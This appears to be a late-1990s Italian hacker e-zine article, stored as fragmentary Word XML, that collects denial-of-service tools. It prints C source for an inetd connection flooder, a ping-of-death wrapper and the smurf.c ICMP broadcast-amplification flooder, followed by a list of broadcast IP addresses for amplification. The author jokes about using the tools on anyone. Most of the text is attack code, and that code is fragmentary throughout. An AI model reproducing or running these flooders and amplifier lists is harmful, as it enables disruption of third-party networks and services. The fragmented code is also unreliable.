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it-IT"/>
        </w:rPr>
        <w:t>D.O.S: disk operating system?naaaaa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utore: SosPiro "!SunSetZer0 CreW!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usica ascoltata: John Lennon (beatles ruLez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bo consumato:tutto quello ke mi passa davanti dal duplo alla polvere della mia camera : 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lora non penserete ke mi metta a fare una tristissima spiegazione su kos'è un denial of service vero??!?Quella l'hanno già fatta in molti ma tanto la cosa da capire è una sola:elimare i lamer ha un senso ke si credono dei fighi soltanto perkè usano Linux o ,peggio ancora, perchè il loro Windows 9X li protegge dalla gente kattiva.Insomma qui trovate soltanto una serie di d.o.s. ke mi sono sembrati davvero interessanti e ( soprattutto ) funzionant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lang w:val="it-IT"/>
        </w:rPr>
        <w:t>1)Il primo qui sotto killa una porta controllata dal super daemon Inet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Inetd DoS by ArchAng3| 0f Death - Member Of Midgard Security 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Disclaimer : This is for educational purposes only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include &lt;stdio.h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ring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tdlib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include &lt;netdb.h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types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netinet/in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lt;sys/socket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sockz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usage(char *ese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f("Inetd DoS by ArchAng3| 0f Death - Member Of Midgard Secu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am\n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printf("Syntax : %s host port [times to connect]\n\n",ese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main(int argc, char *argv[]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nt i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(argc!=4){ usage(argv[0]); exit(0);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(i=0;i&lt;atoi(argv[3]);i++)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DoS(argv[1],argv[2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printf("%d - ",i+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rintf("Done!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}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DoS(char *z,char *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{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sockaddr_in si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hostent *h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he=gethostbyname(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(he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memcpy((caddr_t)&amp;sin.sin_addr.s_addr, he-&gt;h_addr, he-&gt;h_leng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 else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("Host [%s] --&gt; Hmm , are you sure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ght??\n\n",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ockz = socket(AF_INET, SOCK_STREAM, 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(sockz &lt; 0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("** Socket Error **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in.sin_family = AF_INE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sin.sin_port = htons(atoi(x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if(connect( sockz, (struct sockaddr * )&amp;sin, sizeof(sin)) &lt; 0 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("Host --&gt; [%s] ** Port --&gt; [%s]\n",z,x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printf("Closed or Firewalled Port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lose(sock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)Pingone della morte:un classic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/*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uffit.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c-Wage -*- wage@idirect.ca &lt;mailto:wage@idirect.ca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12/12/98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is just a modified version of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ngflood.c By Antir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nhanced by David Welton &lt;davidw@cks.com &lt;mailto:davidw@cks.com&gt;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*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include &lt;signal.h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#define PING "/bin/ping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( int argc, char *argv[]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nt pid_ping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argc &lt; 3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>printf("use: %s &lt;hostname&gt; &lt;size&gt; &lt;illegal char&gt; (I'd suggest 7e or 7d)\n", argv[0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>exit(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  <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">}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(!(pid_ping = fork())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execl(PING, "ping", argv[1], "-s", argv[2], "-p", argv[3])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 pid_ping &lt;=0 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eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>printf("pid &lt;= 0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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">}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leep (1); /* give it a second to start going *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while (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if ( kill(pid_ping, SIGALRM)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)Smurf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ignal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tdio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tdlib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ys/socket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ys/types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netinet/in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netinet/ip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netinet/ip_icmp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netdb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ctype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arpa/inet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unistd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#include &amp;lt;string.h&amp;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banner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usage(char *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smurf(int, struct sockaddr_in, u_long, int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ctrlc(int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signed short in_chksum(u_short *, int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/* stamp *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ar id[] = "$Id smurf.c,v 4.0 1997/10/11 13:02:42 EST tfreak Exp $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 main (int argc, char *argv[]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sockaddr_in si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hostent *h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ILE   *bcastfil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nt    i, sock, bcast, delay, num, pktsize, cycle = 0, x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  buf[32], **bcastaddr = malloc(819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banner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ignal(SIGINT, ctrlc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argc &amp;lt; 6) usage(argv[0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(he = gethostbyname(argv[1])) == NULL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error("resolving source host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emcpy((caddr_t)&amp;sin.sin_addr, he-&amp;gt;h_addr, he-&amp;gt;h_leng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in.sin_family = AF_INE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in.sin_port = htons(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num = atoi(argv[3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delay = atoi(argv[4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ktsize = atoi(argv[5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(bcastfile = fopen(argv[2], "r")) == NULL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error("opening bcast file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x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while (!feof(bcastfile)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gets(buf, 32, bcastfil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buf[0] == '#' || buf[0] == '\n' || ! isdigit(buf[0])) continu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or (i = 0; i &amp;lt; strlen(buf); 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if (buf[i] == '\n') buf[i] = '\0'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bcastaddr[x] = malloc(3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strcpy(bcastaddr[x], buf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x++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bcastaddr[x] = 0x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close(bcastfil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x == 0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printf(stderr, "ERROR: no broadcasts found in file %s\n\n", argv[2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pktsize &amp;gt; 1024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fprintf(stderr, "ERROR: packet size must be &amp;lt; 1024\n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(sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) &amp;lt; 0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perror("getting socket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etsockopt(sock, SOL_SOCKET, SO_BROADCAST, (char *)&amp;bcast, sizeof(bcast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rintf("Flooding %s (. = 25 outgoing packets)\n", argv[1]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or (i = 0; i &amp;lt; num || !num; i++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!(i % 25)) { printf("."); fflush(stdout);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smurf(sock, sin, inet_addr(bcastaddr[cycle]), pktsiz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cycle++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if (bcastaddr[cycle] == 0x0) cycle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usleep(delay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uts("\n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return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banner (vo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uts("\nsmurf.c v4.0 by TFreak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usage (char *pr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printf(stderr, "usage: %s &amp;lt;target&amp;gt; &amp;lt;bcast file&amp;gt; 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&amp;lt;num packets&amp;gt; &amp;lt;packet delay&amp;gt; &amp;lt;packet size&amp;gt;\n\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target        = address to hit\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bcast file    = file to read broadcast addresses from\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num packets   = number of packets to send (0 = flood)\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packet delay  = wait between each packet (in ms)\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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>"packet size   = size of packet (&amp;lt; 1024)\n\n", prog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xit(-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smurf (int sock, struct sockaddr_in sin, u_long dest, int psiz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iphdr *i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truct icmphdr *ic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char *packe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acket = malloc(sizeof(struct iphdr) + sizeof(struct icmphdr) + psiz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 = (struct iphdr *)packe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cmp = (struct icmphdr *) (packet + sizeof(struct iphd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memset(packet, 0, sizeof(struct iphdr) + sizeof(struct icmphdr) + psiz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tot_len = htons(sizeof(struct iphdr) + sizeof(struct icmphdr) + psiz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ihl = 5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version = 4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ttl = 255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tos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frag_off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protocol = IPPROTO_IC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saddr = sin.sin_addr.s_add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daddr = des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p-&amp;gt;check = in_chksum((u_short *)ip, sizeof(struct iphd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cmp-&amp;gt;type = 8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cmp-&amp;gt;code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cmp-&amp;gt;checksum = in_chksum((u_short *)icmp, sizeof(struct icmphdr) + psiz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endto(sock, packet, sizeof(struct iphdr) + sizeof(struct icmphdr) + psiz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  <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>0, (struct sockaddr *)&amp;sin, sizeof(struct sockadd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free(packet);           /* free willy! *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d ctrlc (int igno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puts("\nDone!\n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exit(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signed short in_chksum (u_short *addr, int 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register int nleft = le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register int sum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u_short answer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while (nleft &amp;gt; 1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sum += *addr++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nleft -= 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if (nleft == 1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*(u_char *)(&amp;answer) = *(u_char *)add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>sum += answ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um = (sum &amp;gt;&amp;gt; 16) + (sum + 0xffff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sum += (sum &amp;gt;&amp;gt; 16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answer = ~sum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eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>return(answ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r smurfare vi serve pure una lista broadcast..ekkovela qua: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2.33.182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10.228.7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5.229.8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0.154.1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7.155.23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70.163.2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7.109.167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44.122.34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44.122.3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7.13.18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212.16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9.3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9.36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6.40.2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6.40.29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8.5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8.56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2.106.2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104.22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5.152.2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7.98.2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2.68.112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4.134.240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8.23.48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8.23.48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104.22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6.153.20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4.236.237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80.13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80.138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6.254.172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2.77.117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9.215.18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7.98.2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2.77.117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1.217.7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1.217.7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5.152.24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3.49.107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9.215.18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52.157.138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185.244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5.205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9.83.145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8.7.1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8.93.246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1.119.62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9.157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250.220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250.22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250.219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9.250.219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93.49.104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43.55.176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68.179.156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141.249.50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09.84.74.2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oh mi sembra ragionevole come lista di d.o.s...miraccomando usateli soltanto solo contro la gente ke se lo merita (si come no:)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oSpiR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SunsEt Zer0 CreW!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